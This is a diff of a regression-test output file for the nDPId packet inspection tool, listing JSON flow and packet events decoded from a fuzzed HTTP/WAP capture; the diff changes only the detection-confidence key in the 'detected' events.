00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7580000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -39,7 +39,7 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"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"} 
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7580000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"} 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -61,7 +61,7 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} 
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143} 00838{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -70,14 +70,14 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} 
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms","code":0,"content_type":"","user_agent":"SonyricssonT68\/R201A"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms","code":0,"content_type":"","user_agent":"SonyricssonT68\/R201A"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"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"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854543322,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
@@ -91,23 +91,23 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} 